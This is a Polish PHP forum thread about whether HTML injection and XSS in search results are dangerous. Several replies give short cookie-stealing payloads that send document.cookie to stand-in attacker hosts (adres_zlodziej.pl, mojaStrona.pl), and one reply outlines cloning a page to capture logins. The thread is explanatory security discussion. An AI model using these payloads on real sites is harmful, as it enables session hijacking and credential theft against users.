![]() |
![]() ![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 1 Dołączył: 12.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
Html injection - czy może być naprawdę groźne, jeśli założymy, że zachodzi tylko na danych wyświetlanych jednemu użytkownikowi, tymczasowo (np zapytanie do szukarki). Oczywiste jest że jest destruktywne na forach czy systemach komentarzy bo szpeci, ale czy może być groźne dla serwera / aplikacji?
|
|
|
![]()
Post
#2
|
|
![]() Grupa: Zarejestrowani Postów: 640 Pomógł: 44 Dołączył: 8.02.2004 Ostrzeżenie: (0%) ![]() ![]() |
tak, można wykraść cookie usera - np. admina
![]() -------------------- |
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 1 Dołączył: 12.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
A to nie jest tak że alertnąć można tylko swoje cookie?
|
|
|
![]()
Post
#4
|
|
![]() Grupa: Moderatorzy Postów: 8 989 Pomógł: 1550 Dołączył: 8.08.2008 Skąd: Słupsk/Gdańsk ![]() |
A jak ktoś sobie zrobi <script src="http://adres_zlodziej.pl/scirpt?c=document.cookie"></script>
to będzie miał cookie tej osoby ktora otworzy strone. -------------------- |
|
|
![]()
Post
#5
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 1 Dołączył: 12.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
No tak - to zadziała w przypadku forów, komentarzy itd lub jeśli wstrzyknięcie kodu zachodzi przez GET i debil, któremu podeśle się odpowiednio spreparowany URL w niego kliknie. A da się poprzez HTML injection wywołać w jakiś sposób PHP jeśli jest escapowane albo zapodać plik na serwer?
|
|
|
![]()
Post
#6
|
|
![]() Grupa: Zarejestrowani Postów: 640 Pomógł: 44 Dołączył: 8.02.2004 Ostrzeżenie: (0%) ![]() ![]() |
Ogólnie jeżeli twój kod jest podatny na XSS to jego wartość jest zerowa - niezależnie czy tobie wydaje się że to może być "niegroźne"
![]() -------------------- |
|
|
![]()
Post
#7
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 1 Dołączył: 12.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
No jasne, że zerowa. Dlatego nie pisze takiego kodu
![]() |
|
|
![]()
Post
#8
|
|
![]() Grupa: Zarejestrowani Postów: 6 476 Pomógł: 1306 Dołączył: 6.08.2006 Skąd: Kraków Ostrzeżenie: (0%) ![]() ![]() |
Bardzo prosto jest zmylić kogoś, by kliknął w link, któremu uwać nie powinien:
Kod wejdź na <script type="text/javascript">document.write('<a href="http://mojaStrona.pl/?c=' + escape(document.cookie) + '">http://forum.php.pl/e_t109179.html</a>');</script> i poszukaj... Przy czym na mojaStrona.pl może dojść do zapisania danych i przekierowania na Temat: e aby ofiara nawet nie była świadoma, że coś jest nie tak. Równie dobrze można też wyświetlić identyczną stronę (jak docelowa), ale wszystkie dane wprowadzone przez użytkownika zapisywać (loginy, hasła itp.)
|
|
|
![]()
Post
#9
|
|
![]() Grupa: Zarejestrowani Postów: 1 335 Pomógł: 34 Dołączył: 9.11.2005 Skąd: Wrocław Ostrzeżenie: (10%) ![]() ![]() |
Trochę nie na temat, ale jak np. odczytać takie COOKIE na stronie złodzieja? Czyli jaki skrypt przechwytujący takie dane?
-------------------- > > > Tworzenie stron < < <
|
|
|
![]()
Post
#10
|
|
![]() Grupa: Zarejestrowani Postów: 6 476 Pomógł: 1306 Dołączył: 6.08.2006 Skąd: Kraków Ostrzeżenie: (0%) ![]() ![]() |
Jeżeli "zły" link wygląda tak jak ten mój post wyżej to na mojastrona.pl w pliku index.php wystarczy to odebrać poprzez
Oczywiście trzeba jeszcze to odpowiednio przetworzyć, aby otrzymać z tego coś na kształt tablicy $_COOKIE z PHP. |
|
|
![]()
Post
#11
|
|
![]() Grupa: Zarejestrowani Postów: 690 Pomógł: 81 Dołączył: 6.04.2005 Skąd: Szczecin Ostrzeżenie: (0%) ![]() ![]() |
-------------------- |
|
|
![]()
Post
#12
|
|
![]() Newsman Grupa: Moderatorzy Postów: 4 005 Pomógł: 548 Dołączył: 7.04.2008 Skąd: Trzebinia/Kraków ![]() |
a jeszcze warto wspomnieć o spam botach które wykorzystują maile na stronie do wysyłania spamu jeśli adres jest nieodpowiednio zdefiniowany. tu coś o tym
-------------------- |
|
|
![]() ![]() |
![]() |
Wersja Lo-Fi | Aktualny czas: 5.07.2025 - 19:36 |